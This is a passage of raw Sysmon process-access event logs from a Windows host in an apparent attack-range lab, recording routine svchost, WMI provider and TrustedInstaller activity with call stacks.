12:24:45.426{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292639Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.422{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292638Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.422{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292637Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.421{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292636Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.421{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292635Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.421{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292634Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.421{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292633Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.404{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292632Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.404{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292631Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.404{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292630Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.404{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292629Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.404{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292628Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.404{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292627Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.404{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292626Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.404{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292625Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.404{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292624Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.404{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292623Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.404{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292622Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.404{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292621Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.404{BEA10069-028B-6088-0B2A-00000000BB01}52406848C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe{BEA10069-028B-6088-0A2A-00000000BB01}3780C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x8000000000000000292620Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.404{BEA10069-028B-6088-0B2A-00000000BB01}52406848C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe{BEA10069-028B-6088-0A2A-00000000BB01}3780C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x8000000000000000292619Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.389{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292618Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.389{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292617Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.389{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYS